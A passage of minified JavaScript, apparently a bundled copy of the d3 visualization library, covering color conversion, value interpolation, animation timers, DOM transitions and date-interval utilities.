this},displayable:function(){return-.5<=this.r&&this.r<255.5&&-.5<=this.g&&this.g<255.5&&-.5<=this.b&&this.b<255.5&&0<=this.opacity&&this.opacity<=1},hex:kH,formatHex:kH,formatRgb:PH,toString:PH})),rI(Iu,function D4e(t,a,e,i){return 1===arguments.length?NH(t):new Iu(t,a,e,null==i?1:i)},xH(Ib,{brighter:function(t){return t=null==t?WA:Math.pow(WA,t),new Iu(this.h,this.s,this.l*t,this.opacity)},darker:function(t){return t=null==t?.7:Math.pow(.7,t),new Iu(this.h,this.s,this.l*t,this.opacity)},rgb:function(){var t=this.h%360+360*(this.h<0),a=isNaN(t)||isNaN(this.s)?0:this.s,e=this.l,i=e+(e<.5?e:1-e)*a,n=2*e-i;return new $l(cI(t>=240?t-240:t+120,n,i),cI(t,n,i),cI(t<120?t+240:t-120,n,i),this.opacity)},displayable:function(){return(0<=this.s&&this.s<=1||isNaN(this.s))&&0<=this.l&&this.l<=1&&0<=this.opacity&&this.opacity<=1},formatHsl:function(){var t=this.opacity;return(1===(t=isNaN(t)?1:Math.max(0,Math.min(1,t)))?"hsl(":"hsla(")+(this.h||0)+", "+100*(this.s||0)+"%, "+100*(this.l||0)+"%"+(1===t?")":", "+t+")")}}));const lI=t=>()=>t;function WH(t,a){var e=a-t;return e?function zH(t,a){return function(e){return t+e*a}}(t,e):lI(isNaN(t)?a:t)}const BA=function t(a){var e=function R4e(t){return 1==(t=+t)?WH:function(a,e){return e-a?function I4e(t,a,e){return t=Math.pow(t,e),a=Math.pow(a,e)-t,e=1/e,function(i){return Math.pow(t+i*a,e)}}(a,e,t):lI(isNaN(a)?e:a)}}(a);function i(n,r){var c=e((n=VA(n)).r,(r=VA(r)).r),d=e(n.g,r.g),T=e(n.b,r.b),k=WH(n.opacity,r.opacity);return function(q){return n.r=c(q),n.g=d(q),n.b=T(q),n.opacity=k(q),n+""}}return i.gamma=t,i}(1);function FH(t){return function(a){var c,d,e=a.length,i=new Array(e),n=new Array(e),r=new Array(e);for(c=0;c<e;++c)d=VA(a[c]),i[c]=d.r||0,n[c]=d.g||0,r[c]=d.b||0;return i=t(i),n=t(n),r=t(r),d.opacity=1,function(T){return d.r=i(T),d.g=n(T),d.b=r(T),d+""}}}function VH(t,a){var c,e=a?a.length:0,i=t?Math.min(e,t.length):0,n=new Array(i),r=new Array(e);for(c=0;c<i;++c)n[c]=HA(t[c],a[c]);for(;c<e;++c)r[c]=a[c];return function(d){for(c=0;c<i;++c)r[c]=n[c](d);return r}}function S4e(t,a){var e=new Date;return t=+t,a=+a,function(i){return e.setTime(t*(1-i)+a*i),e}}function Rm(t,a){return t=+t,a=+a,function(e){return t*(1-e)+a*e}}function k4e(t,a){var n,e={},i={};for(n in(null===t||"object"!=typeof t)&&(t={}),(null===a||"object"!=typeof a)&&(a={}),a)n in t?e[n]=HA(t[n],a[n]):i[n]=a[n];return function(r){for(n in e)i[n]=e[n](r);return i}}FH(function x4e(t){var a=t.length-1;return function(e){var i=e<=0?e=0:e>=1?(e=1,a-1):Math.floor(e*a),n=t[i],r=t[i+1];return LH((e-i/a)*a,i>0?t[i-1]:2*n-r,n,r,i<a-1?t[i+2]:2*r-n)}}),FH(function w4e(t){var a=t.length;return function(e){var i=Math.floor(((e%=1)<0?++e:e)*a);return LH((e-i/a)*a,t[(i+a-1)%a],t[i%a],t[(i+1)%a],t[(i+2)%a])}});var dI=/[-+]?(?:\d+\.?\d*|\.?\d+)(?:[eE][-+]?\d+)?/g,mI=new RegExp(dI.source,"g");function BH(t,a){var i,n,r,e=dI.lastIndex=mI.lastIndex=0,c=-1,d=[],T=[];for(t+="",a+="";(i=dI.exec(t))&&(n=mI.exec(a));)(r=n.index)>e&&(r=a.slice(e,r),d[c]?d[c]+=r:d[++c]=r),(i=i[0])===(n=n[0])?d[c]?d[c]+=n:d[++c]=n:(d[++c]=null,T.push({i:c,x:Rm(i,n)})),e=mI.lastIndex;return e<a.length&&(r=a.slice(e),d[c]?d[c]+=r:d[++c]=r),d.length<2?T[0]?function O4e(t){return function(a){return t(a)+""}}(T[0].x):function P4e(t){return function(){return t}}(a):(a=T.length,function(k){for(var Y,q=0;q<a;++q)d[(Y=T[q]).i]=Y.x(k);return d.join("")})}function N4e(t,a){a||(a=[]);var n,e=t?Math.min(a.length,t.length):0,i=a.slice();return function(r){for(n=0;n<e;++n)i[n]=t[n]*(1-r)+a[n]*r;return i}}function HA(t,a){var i,e=typeof a;return null==a||"boolean"===e?lI(a):("number"===e?Rm:"string"===e?(i=Dg(a))?(a=i,BA):BH:a instanceof Dg?BA:a instanceof Date?S4e:function L4e(t){return ArrayBuffer.isView(t)&&!(t instanceof DataView)}(a)?N4e:Array.isArray(a)?VH:"function"!=typeof a.valueOf&&"function"!=typeof a.toString||isNaN(a)?k4e:Rm)(t,a)}var UA,Ob,Z1=0,kb=0,Pb=0,qA=0,xg=0,GA=0,Nb="object"==typeof performance&&performance.now?performance:Date,qH="object"==typeof window&&window.requestAnimationFrame?window.requestAnimationFrame.bind(window):function(t){setTimeout(t,17)};function uI(){return xg||(qH(W4e),xg=Nb.now()+GA)}function W4e(){xg=0}function jA(){this._call=this._time=this._next=null}function GH(t,a,e){var i=new jA;return i.restart(t,a,e),i}function jH(){xg=(qA=Nb.now())+GA,Z1=kb=0;try{!function F4e(){uI(),++Z1;for(var a,t=UA;t;)(a=xg-t._time)>=0&&t._call.call(null,a),t=t._next;--Z1}()}finally{Z1=0,function B4e(){for(var t,e,a=UA,i=1/0;a;)a._call?(i>a._time&&(i=a._time),t=a,a=a._next):(e=a._next,a._next=null,a=t?t._next=e:UA=e);Ob=t,hI(i)}(),xg=0}}function V4e(){var t=Nb.now(),a=t-qA;a>1e3&&(GA-=a,qA=t)}function hI(t){Z1||(kb&&(kb=clearTimeout(kb)),t-xg>24?(t<1/0&&(kb=setTimeout(jH,t-Nb.now()-GA)),Pb&&(Pb=clearInterval(Pb))):(Pb||(qA=Nb.now(),Pb=setInterval(V4e,1e3)),Z1=1,qH(jH)))}function QH(t,a,e){var i=new jA;return i.restart(n=>{i.stop(),t(n+a)},a=null==a?0:+a,e),i}jA.prototype=GH.prototype={constructor:jA,restart:function(t,a,e){if("function"!=typeof t)throw new TypeError("callback is not a function");e=(null==e?uI():+e)+(null==a?0:+a),!this._next&&Ob!==this&&(Ob?Ob._next=this:UA=this,Ob=this),this._call=t,this._time=e,hI()},stop:function(){this._call&&(this._call=null,this._time=1/0,hI())}};var H4e=DH("start","end","cancel","interrupt"),U4e=[];function KA(t,a,e,i,n,r){var c=t.__transition;if(c){if(e in c)return}else t.__transition={};!function q4e(t,a,e){var n,i=t.__transition;function c(k){var q,Y,te,pe;if(1!==e.state)return T();for(q in i)if((pe=i[q]).name===e.name){if(3===pe.state)return QH(c);4===pe.state?(pe.state=6,pe.timer.stop(),pe.on.call("interrupt",t,t.__data__,pe.index,pe.group),delete i[q]):+q<a&&(pe.state=6,pe.timer.stop(),pe.on.call("cancel",t,t.__data__,pe.index,pe.group),delete i[q])}if(QH(function(){3===e.state&&(e.state=4,e.timer.restart(d,e.delay,e.time),d(k))}),e.state=2,e.on.call("start",t,t.__data__,e.index,e.group),2===e.state){for(e.state=3,n=new Array(te=e.tween.length),q=0,Y=-1;q<te;++q)(pe=e.tween[q].value.call(t,t.__data__,e.index,e.group))&&(n[++Y]=pe);n.length=Y+1}}function d(k){for(var q=k<e.duration?e.ease.call(null,k/e.duration):(e.timer.restart(T),e.state=5,1),Y=-1,te=n.length;++Y<te;)n[Y].call(t,q);5===e.state&&(e.on.call("end",t,t.__data__,e.index,e.group),T())}function T(){for(var k in e.state=6,e.timer.stop(),delete i[a],i)return;delete t.__transition}i[a]=e,e.timer=GH(function r(k){e.state=1,e.timer.restart(c,e.delay,e.time),e.delay<=k&&c(k-e.delay)},0,e.time)}(t,e,{name:a,index:i,group:n,on:H4e,tween:U4e,time:r.time,delay:r.delay,duration:r.duration,ease:r.ease,timer:null,state:0})}function _I(t,a){var e=Sm(t,a);if(e.state>0)throw new Error("too late; already scheduled");return e}function Ru(t,a){var e=Sm(t,a);if(e.state>3)throw new Error("too late; already running");return e}function Sm(t,a){var e=t.__transition;if(!e||!(e=e[a]))throw new Error("transition not found");return e}var XA,YH=180/Math.PI,CI={translateX:0,translateY:0,rotate:0,skewX:0,scaleX:1,scaleY:1};function JH(t,a,e,i,n,r){var c,d,T;return(c=Math.sqrt(t*t+a*a))&&(t/=c,a/=c),(T=t*e+a*i)&&(e-=t*T,i-=a*T),(d=Math.sqrt(e*e+i*i))&&(e/=d,i/=d,T/=d),t*i<a*e&&(t=-t,a=-a,T=-T,c=-c),{translateX:n,translateY:r,rotate:Math.atan2(a,t)*YH,skewX:Math.atan(T)*YH,scaleX:c,scaleY:d}}function ZH(t,a,e,i){function n(k){return k.length?k.pop()+" ":""}return function(k,q){var Y=[],te=[];return k=t(k),q=t(q),function r(k,q,Y,te,pe,Re){if(k!==Y||q!==te){var Fe=pe.push("translate(",null,a,null,e);Re.push({i:Fe-4,x:Rm(k,Y)},{i:Fe-2,x:Rm(q,te)})}else(Y||te)&&pe.push("translate("+Y+a+te+e)}(k.translateX,k.translateY,q.translateX,q.translateY,Y,te),function c(k,q,Y,te){k!==q?(k-q>180?q+=360:q-k>180&&(k+=360),te.push({i:Y.push(n(Y)+"rotate(",null,i)-2,x:Rm(k,q)})):q&&Y.push(n(Y)+"rotate("+q+i)}(k.rotate,q.rotate,Y,te),function d(k,q,Y,te){k!==q?te.push({i:Y.push(n(Y)+"skewX(",null,i)-2,x:Rm(k,q)}):q&&Y.push(n(Y)+"skewX("+q+i)}(k.skewX,q.skewX,Y,te),function T(k,q,Y,te,pe,Re){if(k!==Y||q!==te){var Fe=pe.push(n(pe)+"scale(",null,",",null,")");Re.push({i:Fe-4,x:Rm(k,Y)},{i:Fe-2,x:Rm(q,te)})}else(1!==Y||1!==te)&&pe.push(n(pe)+"scale("+Y+","+te+")")}(k.scaleX,k.scaleY,q.scaleX,q.scaleY,Y,te),k=q=null,function(pe){for(var Ne,Re=-1,Fe=te.length;++Re<Fe;)Y[(Ne=te[Re]).i]=Ne.x(pe);return Y.join("")}}}var $4e=ZH(function j4e(t){const a=new("function"==typeof DOMMatrix?DOMMatrix:WebKitCSSMatrix)(t+"");return a.isIdentity?CI:JH(a.a,a.b,a.c,a.d,a.e,a.f)},"px, ","px)","deg)"),K4e=ZH(function Q4e(t){return null!=t&&(XA||(XA=document.createElementNS("http://www.w3.org/2000/svg","g")),XA.setAttribute("transform",t),t=XA.transform.baseVal.consolidate())?JH((t=t.matrix).a,t.b,t.c,t.d,t.e,t.f):CI},", ",")",")");function X4e(t,a){var e,i;return function(){var n=Ru(this,t),r=n.tween;if(r!==e)for(var c=0,d=(i=e=r).length;c<d;++c)if(i[c].name===a){(i=i.slice()).splice(c,1);break}n.tween=i}}function Y4e(t,a,e){var i,n;if("function"!=typeof e)throw new Error;return function(){var r=Ru(this,t),c=r.tween;if(c!==i){n=(i=c).slice();for(var d={name:a,value:e},T=0,k=n.length;T<k;++T)if(n[T].name===a){n[T]=d;break}T===k&&n.push(d)}r.tween=n}}function yI(t,a,e){var i=t._id;return t.each(function(){var n=Ru(this,i);(n.value||(n.value={}))[a]=e.apply(this,arguments)}),function(n){return Sm(n,i).value[a]}}function eU(t,a){var e;return("number"==typeof a?Rm:a instanceof Dg?BA:(e=Dg(a))?(a=e,BA):BH)(t,a)}function Z4e(t){return function(){this.removeAttribute(t)}}function e3e(t){return function(){this.removeAttributeNS(t.space,t.local)}}function t3e(t,a,e){var i,r,n=e+"";return function(){var c=this.getAttribute(t);return c===n?null:c===i?r:r=a(i=c,e)}}function i3e(t,a,e){var i,r,n=e+"";return function(){var c=this.getAttributeNS(t.space,t.local);return c===n?null:c===i?r:r=a(i=c,e)}}function a3e(t,a,e){var i,n,r;return function(){var c,T,d=e(this);return null==d?void this.removeAttribute(t):(c=this.getAttribute(t))===(T=d+"")?null:c===i&&T===n?r:(n=T,r=a(i=c,d))}}function n3e(t,a,e){var i,n,r;return function(){var c,T,d=e(this);return null==d?void this.removeAttributeNS(t.space,t.local):(c=this.getAttributeNS(t.space,t.local))===(T=d+"")?null:c===i&&T===n?r:(n=T,r=a(i=c,d))}}function r3e(t,a){return function(e){this.setAttribute(t,a.call(this,e))}}function s3e(t,a){return function(e){this.setAttributeNS(t.space,t.local,a.call(this,e))}}function c3e(t,a){var e,i;function n(){var r=a.apply(this,arguments);return r!==i&&(e=(i=r)&&s3e(t,r)),e}return n._value=a,n}function l3e(t,a){var e,i;function n(){var r=a.apply(this,arguments);return r!==i&&(e=(i=r)&&r3e(t,r)),e}return n._value=a,n}function m3e(t,a){return function(){_I(this,t).delay=+a.apply(this,arguments)}}function u3e(t,a){return a=+a,function(){_I(this,t).delay=a}}function f3e(t,a){return function(){Ru(this,t).duration=+a.apply(this,arguments)}}function p3e(t,a){return a=+a,function(){Ru(this,t).duration=a}}function g3e(t,a){if("function"!=typeof a)throw new Error;return function(){Ru(this,t).ease=a}}function T3e(t,a,e){var i,n,r=function A3e(t){return(t+"").trim().split(/^|\s+/).every(function(a){var e=a.indexOf(".");return e>=0&&(a=a.slice(0,e)),!a||"start"===a})}(a)?_I:Ru;return function(){var c=r(this,t),d=c.on;d!==i&&(n=(i=d).copy()).on(a,e),c.on=n}}var R3e=wb.prototype.constructor;function tU(t){return function(){this.style.removeProperty(t)}}function z3e(t,a,e){return function(i){this.style.setProperty(t,a.call(this,i),e)}}function W3e(t,a,e){var i,n;function r(){var c=a.apply(this,arguments);return c!==n&&(i=(n=c)&&z3e(t,c,e)),i}return r._value=a,r}function U3e(t){return function(a){this.textContent=t.call(this,a)}}function q3e(t){var a,e;function i(){var n=t.apply(this,arguments);return n!==e&&(a=(e=n)&&U3e(n)),a}return i._value=t,i}var $3e=0;function ef(t,a,e,i){this._groups=t,this._parents=a,this._name=e,this._id=i}function iU(){return++$3e}var wg=wb.prototype;ef.prototype=function K3e(t){return wb().transition(t)}.prototype={constructor:ef,select:function w3e(t){var a=this._name,e=this._id;"function"!=typeof t&&(t=iI(t));for(var i=this._groups,n=i.length,r=new Array(n),c=0;c<n;++c)for(var q,Y,d=i[c],T=d.length,k=r[c]=new Array(T),te=0;te<T;++te)(q=d[te])&&(Y=t.call(q,q.__data__,te,d))&&("__data__"in q&&(Y.__data__=q.__data__),k[te]=Y,KA(k[te],a,e,te,k,Sm(q,e)));return new ef(r,this._parents,a,e)},selectAll:function I3e(t){var a=this._name,e=this._id;"function"!=typeof t&&(t=dH(t));for(var i=this._groups,n=i.length,r=[],c=[],d=0;d<n;++d)for(var q,T=i[d],k=T.length,Y=0;Y<k;++Y)if(q=T[Y]){for(var pe,te=t.call(q,q.__data__,Y,T),Re=Sm(q,e),Fe=0,Ne=te.length;Fe<Ne;++Fe)(pe=te[Fe])&&KA(pe,a,e,Fe,te,Re);r.push(te),c.push(q)}return new ef(r,c,a,e)},filter:function M3e(t){"function"!=typeof t&&(t=mH(t));for(var a=this._groups,e=a.length,i=new Array(e),n=0;n<e;++n)for(var T,r=a[n],c=r.length,d=i[n]=[],k=0;k<c;++k)(T=r[k])&&t.call(T,T.__data__,k,r)&&d.push(T);return new ef(i,this._parents,this._name,this._id)},merge:function v3e(t){if(t._id!==this._id)throw new Error;for(var a=this._groups,e=t._groups,i=a.length,r=Math.min(i,e.length),c=new Array(i),d=0;d<r;++d)for(var te,T=a[d],k=e[d],q=T.length,Y=c[d]=new Array(q),pe=0;pe<q;++pe)(te=T[pe]||k[pe])&&(Y[pe]=te);for(;d<i;++d)c[d]=a[d];return new ef(c,this._parents,this._name,this._id)},selection:function S3e(){return new R3e(this._groups,this._parents)},transition:function j3e(){for(var t=this._name,a=this._id,e=iU(),i=this._groups,n=i.length,r=0;r<n;++r)for(var T,c=i[r],d=c.length,k=0;k<d;++k)if(T=c[k]){var q=Sm(T,a);KA(T,t,e,k,c,{time:q.time+q.delay+q.duration,delay:0,duration:q.duration,ease:q.ease})}return new ef(i,this._parents,t,e)},call:wg.call,nodes:wg.nodes,node:wg.node,size:wg.size,empty:wg.empty,each:wg.each,on:function E3e(t,a){var e=this._id;return arguments.length<2?Sm(this.node(),e).on.on(t):this.each(T3e(e,t,a))},attr:function o3e(t,a){var e=LA(t),i="transform"===e?K4e:eU;return this.attrTween(t,"function"==typeof a?(e.local?n3e:a3e)(e,i,yI(this,"attr."+t,a)):null==a?(e.local?e3e:Z4e)(e):(e.local?i3e:t3e)(e,i,a))},attrTween:function d3e(t,a){var e="attr."+t;if(arguments.length<2)return(e=this.tween(e))&&e._value;if(null==a)return this.tween(e,null);if("function"!=typeof a)throw new Error;var i=LA(t);return this.tween(e,(i.local?c3e:l3e)(i,a))},style:function L3e(t,a,e){var i="transform"==(t+="")?$4e:eU;return null==a?this.styleTween(t,function k3e(t,a){var e,i,n;return function(){var r=Y1(this,t),c=(this.style.removeProperty(t),Y1(this,t));return r===c?null:r===e&&c===i?n:n=a(e=r,i=c)}}(t,i)).on("end.style."+t,tU(t)):"function"==typeof a?this.styleTween(t,function O3e(t,a,e){var i,n,r;return function(){var c=Y1(this,t),d=e(this),T=d+"";return null==d&&(this.style.removeProperty(t),T=d=Y1(this,t)),c===T?null:c===i&&T===n?r:(n=T,r=a(i=c,d))}}(t,i,yI(this,"style."+t,a))).each(function N3e(t,a){var e,i,n,d,r="style."+a,c="end."+r;return function(){var T=Ru(this,t),k=T.on,q=null==T.value[r]?d||(d=tU(a)):void 0;(k!==e||n!==q)&&(i=(e=k).copy()).on(c,n=q),T.on=i}}(this._id,t)):this.styleTween(t,function P3e(t,a,e){var i,r,n=e+"";return function(){var c=Y1(this,t);return c===n?null:c===i?r:r=a(i=c,e)}}(t,i,a),e).on("end.style."+t,null)},styleTween:function F3e(t,a,e){var i="style."+(t+="");if(arguments.length<2)return(i=this.tween(i))&&i._value;if(null==a)return this.tween(i,null);if("function"!=typeof a)throw new Error;return this.tween(i,W3e(t,a,null==e?"":e))},text:function H3e(t){return this.tween("text","function"==typeof t?function B3e(t){return function(){var a=t(this);this.textContent=null==a?"":a}}(yI(this,"text",t)):function V3e(t){return function(){this.textContent=t}}(null==t?"":t+""))},textTween:function G3e(t){var a="text";if(arguments.length<1)return(a=this.tween(a))&&a._value;if(null==t)return this.tween(a,null);if("function"!=typeof t)throw new Error;return this.tween(a,q3e(t))},remove:function x3e(){return this.on("end.remove",function D3e(t){return function(){var a=this.parentNode;for(var e in this.__transition)if(+e!==t)return;a&&a.removeChild(this)}}(this._id))},tween:function J4e(t,a){var e=this._id;if(t+="",arguments.length<2){for(var c,i=Sm(this.node(),e).tween,n=0,r=i.length;n<r;++n)if((c=i[n]).name===t)return c.value;return null}return this.each((null==a?X4e:Y4e)(e,t,a))},delay:function h3e(t){var a=this._id;return arguments.length?this.each(("function"==typeof t?m3e:u3e)(a,t)):Sm(this.node(),a).delay},duration:function _3e(t){var a=this._id;return arguments.length?this.each(("function"==typeof t?f3e:p3e)(a,t)):Sm(this.node(),a).duration},ease:function C3e(t){var a=this._id;return arguments.length?this.each(g3e(a,t)):Sm(this.node(),a).ease},easeVarying:function b3e(t){if("function"!=typeof t)throw new Error;return this.each(function y3e(t,a){return function(){var e=a.apply(this,arguments);if("function"!=typeof e)throw new Error;Ru(this,t).ease=e}}(this._id,t))},end:function Q3e(){var t,a,e=this,i=e._id,n=e.size();return new Promise(function(r,c){var d={value:c},T={value:function(){0==--n&&r()}};e.each(function(){var k=Ru(this,i),q=k.on;q!==t&&((a=(t=q).copy())._.cancel.push(d),a._.interrupt.push(d),a._.end.push(T)),k.on=a}),0===n&&r()})},[Symbol.iterator]:wg[Symbol.iterator]};var Y3e={time:null,delay:0,duration:250,ease:function X3e(t){return((t*=2)<=1?t*t*t:(t-=2)*t*t+2)/2}};function J3e(t,a){for(var e;!(e=t.__transition)||!(e=e[a]);)if(!(t=t.parentNode))throw new Error(`transition ${a} not found`);return e}wb.prototype.interrupt=function G4e(t){return this.each(function(){!function gI(t,a){var i,n,c,e=t.__transition,r=!0;if(e){for(c in a=null==a?null:a+"",e)(i=e[c]).name===a?(n=i.state>2&&i.state<5,i.state=6,i.timer.stop(),i.on.call(n?"interrupt":"cancel",t,t.__data__,i.index,i.group),delete e[c]):r=!1;r&&delete t.__transition}}(this,t)})},wb.prototype.transition=function Z3e(t){var a,e;t instanceof ef?(a=t._id,t=t._name):(a=iU(),(e=Y3e).time=uI(),t=null==t?null:t+"");for(var i=this._groups,n=i.length,r=0;r<n;++r)for(var T,c=i[r],d=c.length,k=0;k<d;++k)(T=c[k])&&KA(T,t,a,k,c,e||J3e(T,a));return new ef(i,this._parents,t,a)};Math;function Lb(t){return{type:t}}function DI(t,a){return t<a?-1:t>a?1:t>=a?0:NaN}function xI(t){let a=t,e=t;function i(c,d,T,k){for(null==T&&(T=0),null==k&&(k=c.length);T<k;){const q=T+k>>>1;e(c[q],d)<0?T=q+1:k=q}return T}return 1===t.length&&(a=(c,d)=>t(c)-d,e=function mAe(t){return(a,e)=>DI(t(a),e)}(t)),{left:i,center:function r(c,d,T,k){null==T&&(T=0),null==k&&(k=c.length);const q=i(c,d,T,k-1);return q>T&&a(c[q-1],d)>-a(c[q],d)?q-1:q},right:function n(c,d,T,k){for(null==T&&(T=0),null==k&&(k=c.length);T<k;){const q=T+k>>>1;e(c[q],d)>0?k=q:T=q+1}return T}}}["w","e"].map(Lb),["n","s"].map(Lb),["n","w","e","s","nw","ne","sw","se"].map(Lb);var wI=Math.sqrt(50),II=Math.sqrt(10),RI=Math.sqrt(2);function cU(t,a,e){var i=(a-t)/Math.max(0,e),n=Math.floor(Math.log(i)/Math.LN10),r=i/Math.pow(10,n);return n>=0?(r>=wI?10:r>=II?5:r>=RI?2:1)*Math.pow(10,n):-Math.pow(10,-n)/(r>=wI?10:r>=II?5:r>=RI?2:1)}function SI(t,a,e){var i=Math.abs(a-t)/Math.max(0,e),n=Math.pow(10,Math.floor(Math.log(i)/Math.LN10)),r=i/n;return r>=wI?n*=10:r>=II?n*=5:r>=RI&&(n*=2),a<t?-n:n}const af=1e3,Fd=6e4,nf=60*Fd,Ig=24*nf,kI=7*Ig,lU=30*Ig,PI=365*Ig;var OI=new Date,NI=new Date;function $s(t,a,e,i){function n(r){return t(r=0===arguments.length?new Date:new Date(+r)),r}return n.floor=function(r){return t(r=new Date(+r)),r},n.ceil=function(r){return t(r=new Date(r-1)),a(r,1),t(r),r},n.round=function(r){var c=n(r),d=n.ceil(r);return r-c<d-r?c:d},n.offset=function(r,c){return a(r=new Date(+r),null==c?1:Math.floor(c)),r},n.range=function(r,c,d){var k,T=[];if(r=n.ceil(r),d=null==d?1:Math.floor(d),!(r<c&&d>0))return T;do{T.push(k=new Date(+r)),a(r,d),t(r)}while(k<r&&r<c);return T},n.filter=function(r){return $s(function(c){if(c>=c)for(;t(c),!r(c);)c.setTime(c-1)},function(c,d){if(c>=c)if(d<0)for(;++d<=0;)for(;a(c,-1),!r(c););else for(;--d>=0;)for(;a(c,1),!r(c););})},e&&(n.count=function(r,c){return OI.setTime(+r),NI.setTime(+c),t(OI),t(NI),Math.floor(e(OI,NI))},n.every=function(r){return r=Math.floor(r),isFinite(r)&&r>0?r>1?n.filter(i?function(c){return i(c)%r==0}:function(c){return n.count(0,c)%r==0}):n:null}),n}var ZA=$s(function(){},function(t,a){t.setTime(+t+a)},function(t,a){return a-t});ZA.every=function(t){return t=Math.floor(t),isFinite(t)&&t>0?t>1?$s(function(a){a.setTime(Math.floor(a/t)*t)},function(a,e){a.setTime(+a+e*t)},function(a,e){return(e-a)/t}):ZA:null};const hAe=ZA;const zb=$s(function(t){t.setTime(t-t.getMilliseconds())},function(t,a){t.setTime(+t+a*af)},function(t,a){return(a-t)/af},function(t){return t.getUTCSeconds()});const uU=$s(function(t){t.setTime(t-t.getMilliseconds()-t.getSeconds()*af)},function(t,a){t.setTime(+t+a*Fd)},function(t,a){return(a-t)/Fd},function(t){return t.getMinutes()});const fU=$s(function(t){t.setTime(t-t.getMilliseconds()-t.getSeconds()*af-t.getMinutes()*Fd)},function(t,a){t.setTime(+t+a*nf)},function(t,a){return(a-t)/nf},function(t){return t.getHours()});const eT=$s(t=>t.setHours(0,0,0,0),(t,a)=>t.setDate(t.getDate()+a),(t,a)=>(a-t-(a.getTimezoneOffset()-t.getTimezoneOffset())*Fd)/Ig,t=>t.getDate()-1);function Rg(t){return $s(function(a){a.setDate(a.getDate()-(a.getDay()+7-t)%7),a.setHours(0,0,0,0)},function(a,e){a.setDate(a.getDate()+7*e)},function(a,e){return(e-a-(e.getTimezoneOffset()-a.getTimezoneOffset())*Fd)/kI})}var tT=Rg(0),iT=Rg(1),a2=(Rg(2),Rg(3),Rg(4));const gU=(Rg(5),Rg(6),$s(function(t){t.setDate(1),t.setHours(0,0,0,0)},function(t,a){t.setMonth(t.getMonth()+a)},function(t,a){return a.getMonth()-t.getMonth()+12*(a.getFullYear()-t.getFullYear())},function(t){return t.getMonth()}));var LI=$s(function(t){t.setMonth(0,1),t.setHours(0,0,0,0)},function(t,a){t.setFullYear(t.getFullYear()+a)},function(t,a){return a.getFullYear()-t.getFullYear()},function(t){return t.getFullYear()});LI.every=function(t){return isFinite(t=Math.floor(t))&&t>0?$s(function(a){a.setFullYear(Math.floor(a.getFullYear()/t)*t),a.setMonth(0,1),a.setHours(0,0,0,0)},function(a,e){a.setFullYear(a.getFullYear()+e*t)}):null};const Sg=LI;const CAe=$s(function(t){t.setUTCSeconds(0,0)},function(t,a){t.setTime(+t+a*Fd)},function(t,a){return(a-t)/Fd},function(t){return t.getUTCMinutes()});const yAe=$s(function(t){t.setUTCMinutes(0,0,0)},function(t,a){t.setTime(+t+a*nf)},function(t,a){return(a-t)/nf},function(t){return t.getUTCHours()});const zI=$s(function(t){t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCDate(t.getUTCDate()+a)},function(t,a){return(a-t)/Ig},function(t){return t.getUTCDate()-1});function kg(t){return $s(function(a){a.setUTCDate(a.getUTCDate()-(a.getUTCDay()+7-t)%7),a.setUTCHours(0,0,0,0)},function(a,e){a.setUTCDate(a.getUTCDate()+7*e)},function(a,e){return(e-a)/kI})}var WI=kg(0),aT=kg(1),n2=(kg(2),kg(3),kg(4));const TAe=(kg(5),kg(6),$s(function(t){t.setUTCDate(1),t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCMonth(t.getUTCMonth()+a)},function(t,a){return a.getUTCMonth()-t.getUTCMonth()+12*(a.getUTCFullYear()-t.getUTCFullYear())},function(t){return t.getUTCMonth()}));var FI=$s(function(t){t.setUTCMonth(0,1),t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCFullYear(t.getUTCFullYear()+a)},function(t,a){return a.getUTCFullYear()-t.getUTCFullYear()},function(t){return t.getUTCFullYear()});FI.every=function(t){return isFinite(t=Math.floor(t))&&t>0?$s(function(a){a.setUTCFullYear(Math.floor(a.getUTCFullYear()/t)*t),a.setUTCMonth(0,1),a.setUTCHours(0,0,0,0)},function(a,e){a.setUTCFullYear(a.getUTCFullYear()+e*t)}):null};const o2=FI;function vU(t,a,e,i,n,r){const c=[[zb,1,af],[zb,5,5e3],[zb,15,15e3],[zb,30,3e4],[r,1,Fd],[r,5,5*Fd],[r,15,15*Fd],[r,30,30*Fd],[n,1,nf],[n,3,3*nf],[n,6,6*nf],[n,12,12*nf],[i,1,Ig],[i,2,2*Ig],[e,1,kI],[a,1,lU],[a,3,3*lU],[t,1,PI]];function T(k,q,Y){const te=Math.abs(q-k)/Y,pe=xI(([,,Ne])=>Ne).right(c,te);if(pe===c.length)return t.every(SI(k/PI,q/PI,Y));if(0===pe)return hAe.every(Math.max(SI(k,q,Y),1));const[Re,Fe]=c[te/c[pe-1][2]<c[pe][2]/te?pe-1:pe];return Re.every(Fe)}return[function d(k,q,Y){const te=q<k;te&&([k,q]=[q,k]);const pe=Y&&"function"==typeof Y.range?Y:T(k,q,Y),Re=pe?pe.range(k,+q+1):[];return te?Re.reverse():Re},T]}const[Gwt,jwt]=vU(o2,TAe,WI,zI,yAe,CAe),[EAe,DAe]=vU(Sg,gU,tT,eT,fU,uU);function VI(t){if(0<=t.y&&t.y<100){var a=new Date(-1,t.m,t.d,t.H,t.M,t.S,t.L);return a.setFullYear(t.y),a}return new Date(t.y,t.m,t.d,t.H,t.M,t.S,t.L)}function BI(t){if(0<=t.y&&t.y<100){var a=new Date(Date.UTC(-1,t.m,t.d,t.H,t.M,t.S,t.L));return a.setUTCFullYear(t.y),a}return new Date(Date.UTC(t.y,t.m,t.d,t.H,t.M,t.S,t.L))}function Wb(t,a,e){return{y:t,m:a,d:e,H:0,M:0,S:0,L:0}}var AU={"-":"",_:" ",0:"0"},Ks=/^\s*\d+/,wAe=/^%/,IAe=/[\\^$*+?|[\]().{}]/g;function No(t,a,e){var i=t<0?"-":"",n=(i?-t:t)+"",r=n.length;return i+(r<e?new Array(e-r+1).join(a)+n:n)}function RAe(t){return t.replace(IAe,"\\$&")}function Fb(t){return new RegExp("^(?:"+t.map(RAe).join("|")+")","i")}function Vb(t){return new Map(t.map((a,e)=>[a.toLowerCase(),e]))}function SAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.w=+i[0],e+i[0].length):-1}function kAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.u=+i[0],e+i[0].length):-1}function PAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.U=+i[0],e+i[0].length):-1}function OAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.V=+i[0],e+i[0].length):-1}function NAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return 